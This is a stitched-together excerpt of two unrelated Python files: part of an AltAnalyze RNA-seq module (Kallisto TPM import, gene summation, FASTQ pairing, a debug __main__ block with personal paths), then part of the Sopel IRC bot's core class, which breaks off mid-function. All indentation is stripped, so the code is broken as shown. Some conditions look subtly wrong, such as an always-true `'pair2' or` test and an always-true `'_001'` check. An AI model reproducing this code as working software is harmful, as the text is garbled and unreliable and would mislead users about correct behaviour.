exportMatrix(ico,headers,countMatrix,counts=True) ### Export transcript count matrix
try:
geneMatrix = calculateGeneTPMs(species,expMatrix) ### calculate combined gene level TPMs
countsGeneMatrix = calculateGeneTPMs(species,countMatrix) ### calculate combined gene level TPMs
exportMatrix(go,headers,geneMatrix) ### export gene expression matrix
exportMatrix(co,headers,countsGeneMatrix,counts=True) ### export gene expression matrix
except Exception:
print 'AltAnalyze was unable to summarize gene TPMs from transcripts, proceeding with transcripts.'
export.copyFile(root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt',root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt')
exportMatrix(so,['SampleID','Estimated Counts','Total Fragments','Percent Aligned'],countSampleMatrix) ### export gene expression matrix
### Copy results to the Kallisto_Results directory
try: os.mkdir(root_dir+'/ExpressionInput/Kallisto_Results')
except: pass
try:
tf = root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/isoCounts.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/counts.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/summary.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
except:
print traceback.format_exc()
pass
def calculateGeneTPMs(species,expMatrix):
import gene_associations
try:
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
if len(gene_to_transcript_db)<10:
raise ValueError('Ensembl-EnsTranscript file missing, forcing download of this file')
except Exception:
try:
print 'Missing transcript-to-gene associations... downloading from Ensembl.'
from build_scripts import EnsemblSQL
db_version = unique.getCurrentGeneDatabaseVersion()
EnsemblSQL.getGeneTranscriptOnly(species,'Basic',db_version,'yes')
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
except Exception:
from build_scripts import GeneSetDownloader
print 'Ensembl-EnsTranscripts required for gene conversion... downloading from the web...'
GeneSetDownloader.remoteDownloadEnsemblTranscriptAssocations(species)
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
if len(gene_to_transcript_db)<10:
print 'NOTE: No valid Ensembl-EnsTranscripts available, proceeding with the analysis of transcripts rather than genes...'
from import_scripts import OBO_import
transcript_to_gene_db = OBO_import.swapKeyValues(gene_to_transcript_db)
gene_matrix = {}
present_gene_transcripts={}
for transcript in expMatrix:
if '.' in transcript:
transcript_alt = string.split(transcript,'.')[0]
else:
transcript_alt = transcript
if transcript_alt in transcript_to_gene_db:
gene = transcript_to_gene_db[transcript_alt][0]
try: present_gene_transcripts[gene].append(transcript)
except Exception: present_gene_transcripts[gene] = [transcript]
else: pass ### could keep track of the missing transcripts
for gene in present_gene_transcripts:
gene_values = []
for transcript in present_gene_transcripts[gene]:
gene_values.append(map(float,expMatrix[transcript]))
gene_tpms = [sum(value) for value in zip(*gene_values)] ### sum of all transcript tmp's per sample
gene_tpms = map(str,gene_tpms)
gene_matrix[gene] = gene_tpms
if len(gene_matrix)>0:
return gene_matrix
else:
print "NOTE: No valid transcript-gene associations available... proceeding with Transcript IDs rather than gene."
return expMatrix
def exportMatrix(eo,headers,matrix,counts=False):
eo.write(string.join(headers,'\t')+'\n')
for gene in matrix:
values = matrix[gene]
if counts:
values = map(str,map(int,map(float,values)))
eo.write(string.join([gene]+values,'\t')+'\n')
eo.close()
def importTPMs(sample,input_path,expMatrix,countMatrix,countSampleMatrix):
firstLine=True
for line in open(input_path,'rU').xreadlines():
data = cleanUpLine(line)
if firstLine:
firstLine=False
header = string.split(data,'\t')
else:
target_id,length,eff_length,est_counts,tpm = string.split(data,'\t')
try: float(est_counts);
except Exception: ### nan instead of float found due to lack of alignment
est_counts = '0.0'
tpm = '0.0'
if '.' in target_id:
target_id = string.split(target_id,'.')[0] ### Ensembl isoform IDs in more recent Ensembl builds
try: expMatrix[target_id].append(tpm)
except Exception: expMatrix[target_id]=[tpm]
try: countSampleMatrix[sample]+=float(est_counts)
except Exception: countSampleMatrix[sample]=float(est_counts)
try: countMatrix[target_id].append(est_counts)
except Exception: countMatrix[target_id]=[est_counts]
return expMatrix,countMatrix,countSampleMatrix
def importTotalReadCounts(sample,input_path,sample_total_counts):
### Import from Kallisto Json file
for line in open(input_path,'rU').xreadlines():
data = cleanUpLine(line)
if "n_processed: " in data:
total = string.split(data,"n_processed: ")[1]
total = string.split(total,',')[0]
sample_total_counts[sample]=total
return sample_total_counts
def findPairs(fastq_paths):
#fastq_paths = ['/Volumes/test/run0718_lane12_read1_index701=Kopan_RBP_02_14999.fastq.gz','/Volumes/run0718_lane12_read2_index701=Kopan_RBP_02_14999.fastq.gz']
import export
read_notation=0
under_suffix_notation=0
suffix_notation=0
equal_notation=0
suffix_db={}
for i in fastq_paths:
if 'read1' in i or 'read2' in i or 'pair1' in i or 'pair2' or 'R1' in i or 'R2' in i:
read_notation+=1
f = export.findFilename(i)
if 'fastq' in f:
name = string.split(f,'fastq')[0]
elif 'FASTQ' in f:
name = string.split(f,'FASTQ')[0]
elif 'fq' in f:
name = string.split(f,'fq')[0]
if '_1.' in name or '_2.' in name:
under_suffix_notation+=1
elif '1.' in name or '2.' in name:
suffix_notation+=1
suffix_db[name[-2:]]=[]
if '=' in name:
equal_notation+=1
if read_notation==0 and suffix_notation==0 and under_suffix_notation==0:
new_names={}
for i in fastq_paths:
if '/' in i or '\\' in i:
n = export.findFilename(i)
if '=' in n:
n = string.split(n,'=')[1]
new_names[n] = [i]
### likely single-end samples
return new_names, 'single'
else:
new_names={}
paired = 'paired'
if equal_notation==len(fastq_paths):
for i in fastq_paths:
name = string.split(i,'=')[-1]
name = string.replace(name,'.fastq.gz','')
name = string.replace(name,'.fastq','')
name = string.replace(name,'.FASTQ.gz','')
name = string.replace(name,'.FASTQ','')
name = string.replace(name,'.fq.gz','')
name = string.replace(name,'.fq','')
if '/' in name or '\\' in name:
name = export.findFilename(name)
if '=' in name:
name = string.split(name,'=')[1]
try: new_names[name].append(i)
except Exception: new_names[name]=[i]
else:
for i in fastq_paths:
if suffix_notation == len(fastq_paths) and len(suffix_db)==2: ### requires that files end in both .1 and .2
pairs = ['1.','2.']
else:
pairs = ['-read1','-read2','-pair1','-pair2','_read1','_read2','_pair1','_pair2','read1','read2','pair1','pair2','_1.','_2.','_R1','_R2','-R1','-R2','R1','R2']
n=str(i)
n = string.replace(n,'fastq.gz','')
n = string.replace(n,'fastq','')
for p in pairs: n = string.replace(n,p,'')
if '/' in n or '\\' in n:
n = export.findFilename(n)
if '=' in n:
n = string.split(n,'=')[1]
if n[-1]=='.':
n = n[:-1] ###remove the last decimal
try: new_names[n].append(i)
except Exception: new_names[n]=[i]
for i in new_names:
if len(new_names[i])>1:
pass
else:
paired = 'single'
new_names = checkForMultipleLanes(new_names)
return new_names, paired
def checkForMultipleLanes(new_names):
""" This function further aggregates samples run across multiple flowcells """
read_count = 0
lane_count = 0
updated_names={}
for sample in new_names:
reads = new_names[sample]
count=0
for read in reads:
read_count+=1
if '_L00' in read and '_001':
### assumes no more than 9 lanes/sample
count+=1
if len(reads) == count: ### Multiple lanes run per sample
lane_count+=count
if lane_count==read_count:
for sample in new_names:
sample_v1 = string.replace(sample,'_001','')
sample_v1 = string.split(sample_v1,'_L00')
if len(sample_v1[-1])==1: ### lane number
sample_v1 = sample_v1[0]
if sample_v1 in updated_names:
updated_names[sample_v1]+=new_names[sample]
else:
updated_names[sample_v1]=new_names[sample]
if len(updated_names)==0:
updated_names = new_names
return updated_names
def getFASTAFile(species):
fasta_folder = 'AltDatabase/'+species+'/SequenceData/'
fasta_files=[]
dir_list = read_directory(filepath(fasta_folder))
for file in dir_list:
if '.fa' in file:
fasta_files.append(filepath(fasta_folder)+file)
return fasta_files
if __name__ == '__main__':
samplesDiffering = 3
column_method = 'hopach'
species = 'Hs'
excludeCellCycle = False
platform = 'RNASeq'; graphic_links=[('','/Volumes/HomeBackup/CCHMC/PBMC-10X/ExpressionInput/SamplePrediction/DataPlots/Clustering-33k_CPTT_matrix-CORRELATED-FEATURES-iterFilt-hierarchical_cosine_cosine.txt')]
"""
graphic_links,new_results_file = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',
numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,graphics=graphic_links,
ColumnMethod=column_method, transpose=True, includeMoreCells=True)
"""
import UI; import multiprocessing as mlp
#runKallisto('Mm','BoneMarrow','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/altanalyze/Mm-FASTQ','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/altanalyze/Mm-FASTQ',mlp);sys.exit()
runKallisto('Hs','BreastCancer','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/BreastCancerDemo/FASTQs/input','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/BreastCancerDemo/FASTQs/input',mlp);sys.exit()
results_file = '/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/l/July-2017/PSI/test/Clustering-exp.round2-Guide3-hierarchical_cosine_correlation.txt'
#correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=50,ReDefinedClusterBlocks=True,filter=True)
#sys.exit()
#correlateClusteredGenes('exons',results_file,stringency='strict',rhoCutOff=0.6);sys.exit()
#sys.exit()
species='Hs'; platform = "3'array"; vendor = "3'array"
#FeatureCounts('/Users/saljh8/Downloads/subread-1.5.2-MaxOSX-x86_64/annotation/mm10_AltAnalyze.txt', '/Users/saljh8/Desktop/Grimes/GEC14074/Grimes_092914_Cell12.bam')
#sys.exit()
import UI; import multiprocessing as mlp
gsp = UI.GeneSelectionParameters(species,platform,vendor)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setJustShowTheseIDs('')
gsp.setNormalize('median')
gsp.setSampleDiscoveryParameters(1,50,4,4,
True,'gene','protein_coding',False,'cosine','hopach',0.4)
#expFile = '/Users/saljh8/Desktop/Grimes/KashishNormalization/test/Original/ExpressionInput/exp.CombinedSingleCell_March_15_2015.txt'
expFile = '/Volumes/My Passport/salomonis2/SRP042161_GBM-single-cell/bams/ExpressionInput/exp.GBM_scRNA-Seq-steady-state.txt'
#singleCellRNASeqWorkflow('Hs', "RNASeq", expFile, mlp, parameters=gsp);sys.exit()
filename = '/Users/saljh8/Desktop/dataAnalysis/Collaborative/Grimes/Trumpp-HSC-2017/counts.rawTrumpp.txt'
filename = '/Volumes/salomonis2/Erica-data/GSE98451/counts.GSE98451_uterus_single_cell_RNA-Seq_counts-Ensembl.txt'
#fastRPKMCalculate(filename);sys.exit()
#calculateRPKMsFromGeneCounts(filename,'Mm',AdjustExpression=False);sys.exit()
#copyICGSfiles('','');sys.exit()
import multiprocessing as mlp
import UI
species='Mm'; platform = "3'array"; vendor = 'Ensembl'
gsp = UI.GeneSelectionParameters(species,platform,vendor)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setJustShowTheseIDs('')
gsp.setNormalize('median')
gsp.setSampleDiscoveryParameters(0,0,1.5,3,
False,'PSI','protein_coding',False,'cosine','hopach',0.35)
#gsp.setSampleDiscoveryParameters(1,1,4,3, True,'Gene','protein_coding',False,'cosine','hopach',0.5)
filename = '/Volumes/SEQ-DATA/AML_junction/AltResults/AlternativeOutput/Hs_RNASeq_top_alt_junctions-PSI-clust.txt'
#fastRPKMCalculate(filename);sys.exit()
results_file = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/ExpressionInput/DataPlots/400 fold for at least 4 samples/Clustering-myeloblast-steady-state-correlated-features-hierarchical_euclidean_cosine-hopach.txt'
guideGeneFile = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/ExpressionInput/drivingTFs-symbol.txt'
expFile = '/Users/saljh8/Desktop/Grimes/KashishNormalization/3-25-2015/ExpressionInput/exp.CombinedSingleCell_March_15_2015.txt'
expFile = '/Users/saljh8/Desktop/dataAnalysis/Mm_Kiddney_tubual/ExpressionInput/exp.E15.5_Adult_IRI Data-output.txt'
expFile = '/Users/saljh8/Desktop/PCBC_MetaData_Comparisons/temp/C4Meth450-filtered-SC-3_regulated.txt'
expFile = '/Volumes/SEQ-DATA/Grimeslab/TopHat/AltResults/AlternativeOutput/Mm_RNASeq_top_alt_junctions-PSI-clust-filter.txt'
expFile = '/Users/saljh8/Documents/L_TargetPSIFiles/exp.TArget_psi_noif_uncorr_03-50missing-12high.txt'
expFile = '/Volumes/BOZEMAN2015/Hs_RNASeq_top_alt_junctions-PSI-clust-filter.txt'
singleCellRNASeqWorkflow('Hs', "exons", expFile, mlp, exp_threshold=0, rpkm_threshold=0, parameters=gsp);sys.exit()
#expFile = '/Users/saljh8/Desktop/Grimes/AltSplice/Gmp-cluster-filter.txt'
#singleCellRNASeqWorkflow('Mm', "exons", expFile, mlp, exp_threshold=0, rpkm_threshold=0, parameters=gsp);sys.exit()
#expFile = '/Users/saljh8/Downloads/methylation/ExpressionInput/exp.female-steady-state.txt'
#singleCellRNASeqWorkflow('Hs', 'RNASeq', expFile, mlp, exp_threshold=50, rpkm_threshold=5) # drivers=guideGeneFile)
#sys.exit()
#correlateClusteredGenes(results_file);sys.exit()
#reformatExonFile('Hs','exon',True);sys.exit()
filename = '/Volumes/Time Machine Backups/dataAnalysis/PCBC_Sep2013/C4-reference/ExpressionInput/counts.C4.txt'
#fastRPKMCalculate(filename);sys.exit()
file1 = '/Volumes/My Passport/dataAnalysis/CardiacRNASeq/BedFiles/ExpressionInput/exp.CardiacRNASeq.txt'
file2 = '/Volumes/Time Machine Backups/dataAnalysis/PCBC_Sep2013/C4-reference/ReferenceComps/ExpressionInput/counts.C4.txt'
#getHighExpNovelExons('Hs',file1);sys.exit()
#mergeCountFiles(file1,file2); sys.exit()
import UI
test_status = 'yes'
data_type = 'ncRNA'
data_type = 'mRNA'
array_type = 'RNASeq'
array_type = 'junction'
species = 'Hs' ### edit this
summary_results_db = {}
root_dir = '/Volumes/Time Machine Backups/dataAnalysis/Human Blood/Exon/Multiple Sclerosis/Untreated_MS-analysis/'
#root_dir = '/Volumes/Time Machine Backups/dataAnalysis/Human Blood/Exon/Multiple Sclerosis/2-3rds_training-untreated/'
root_dir = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/400-original/'
#root_dir = '/Volumes/My Passport/dataAnalysis/PCBC_Dec2013/All/bedFiles/'
root_dir = '/Users/saljh8/Desktop/dataAnalysis/HTA2.0 Files/'
#summary_results_db['Hs_Junction_d14_vs_d7.p5_average-ASPIRE-exon-inclusion-results.txt'] = [] ### edit this
#summary_results_db['Hs_Junction_d14_vs_d7.p5_average-splicing-index-exon-inclusion-results.txt'] = [] ### edit this
results_dir = root_dir +'AltResults/AlternativeOutput/'
dir_list = read_directory(results_dir)
for i in dir_list:
if '_average' in i:
comparison, end = string.split(i,'_average')
if '-exon-inclusion-results.txt' in i: summary_results_db[comparison]=[]
compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir); sys.exit()
fl = UI.ExpressionFileLocationData('','','',''); fl.setCELFileDir(loc); fl.setRootDir(loc)
exp_file_location_db={}; exp_file_location_db['test']=fl
alignJunctionsToEnsembl(species,exp_file_location_db,'test'); sys.exit()
getEnsemblAssociations(species,data_type,test_status,'yes'); sys.exit()
|
bot.py
|
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import itertools
import logging
import re
import signal
import threading
import time
from typing import Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
import sopel.loader
from sopel.module import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
QUIT_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
if hasattr(signal, name)
]
RESTART_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR2', 'SIGILL']
if hasattr(signal, name)
]
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super(Sopel, self).__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
self._plugins = {}
self._rules_manager = plugin_rules.Manager()
self._scheduler = plugin_jobs.Scheduler(self)
self._url_callbacks = tools.SopelMemory()
"""Tracking of manually registered URL callbacks.
Should be manipulated only by use of :meth:`register_url_callback` and
:meth:`unregister_url_callback` methods, which are deprecated.
Remove in Sopel 9, along with the above related methods.
"""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set.
"""
self.channels = tools.SopelIdentifierMemory()
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelIdentifierMemory()
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
@property
def rules(self):
"""Rules manager."""
return self._rules_manager
@property
def scheduler(self):
"""Job Scheduler. See :func:`sopel.plugin.interval`."""
return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
a least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
to setup signals. If the bot is connected, upon receiving a signal it
will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
def _signal_handler(self, sig, frame):
if sig in QUIT_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got quit signal, sending QUIT to server.")
self.quit('Closing')
else:
self.hasquit = True # mark the bot as "want to quit"
LOGGER.warning("Got quit signal.")
raise KeyboardInterrupt
elif sig in RESTART_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got restart signal, sending QUIT to server.")
self.restart('Restarting')
else:
LOGGER.warning("Got restart signal.")
self.wantsrestart = True # mark the bot as "want to restart"
self.hasquit = True # mark the bot as "want to quit"
raise KeyboardInterrupt
# setup
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info("Loading plugins...")
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error loading %s: %s", name, e)
except SystemExit:
load_error = load_error + 1
LOGGER.exception(
"Error loading %s (plugin tried to exit)", name)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error in %s setup: %s", name, e)
else:
load_success = load_success + 1
LOGGER.info("Plugin loaded: %s", name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
"Registered %d plugins, %d failed, %d disabled",
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
"""Perform post-setup actions.
This method handles everything that should happen after all the plugins
are loaded, and before the bot can connect to the IRC server.
At the moment, this method checks for undefined configuration options,
and starts the job scheduler.
.. versionadded:: 7.1
"""
settings = self.settings
for section_name, section in settings.get_defined_sections():
for option_name in settings.parser.options(section_name):
if not hasattr(section, option_name):
LOGGER.warning(
"Config option `%s.%s` is not defined by its section "
"and may not be recognized by Sopel.",
section_name,
option_name,
)
self._scheduler.start()
# plugins management
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove plugin rules, jobs, shutdown functions, and url callbacks
self._rules_manager.unregister_plugin(name)
self._scheduler.unregister_plugin(name)
self.unregister_shutdowns(shutdowns)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
# callable management
@deprecated(
reason="Replaced by specific `unregister_*` methods.",
version='7.1',
removed_in='8.0')
def unregister(self, obj):
"""Unregister a shutdown method.
:param obj: the shutdown method to unregister
:type obj: :term:`object`
This method was used to unregister anything (rules, commands, urls,
jobs, and shutdown methods), but since everything can be done by other
means, there is no use for it anymore.
"""
callable_name = getattr(obj, "__name__", 'UNKNOWN')
if hasattr(obj, 'interval'):
self.unregister_jobs([obj])
if callable_name == "shutdown" and obj in self.shutdown_methods:
self.unregister_shutdowns([obj])
@deprecated(
reason="Replaced by specific `register_*` methods.",
version='7.1',
removed_in='8.0')
def register(self, callables, jobs, shutdowns, urls):
"""Register rules, jobs, shutdown methods, and URL callbacks.
:param callables: an iterable of callables to register
:type callables: :term:`iterable`
:param jobs: an iterable of functions to periodically invoke
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions to call on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions to call when matched against a URL
:type urls: :term:`iterable`
The ``callables`` argument contains a list of "callable objects", i.e.
objects for which :func:`callable` will return ``True``. They can be:
* a callable with rules (will match triggers with a regex pattern)
* a callable without rules (will match any triggers, such as events)
* a callable with commands
* a callable with nick commands
* a callable with action commands
It is possible to have a callable with rules, commands, and nick
commands configured. It should not be possible to have a callable with
commands or nick commands but without rules.
"""
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def register_callables(self, callables):
match_any = re.compile(r'.*')
settings = self.settings
for callbl in callables:
rules = getattr(callbl, 'rule', [])
lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
find_rules = getattr(callbl, 'find_rules', [])
lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
search_rules = getattr(callbl, 'search_rules', [])
lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
is_rule = any([
rules,
lazy_rules,
find_rules,
lazy_find_rules,
search_rules,
lazy_search_rules,
])
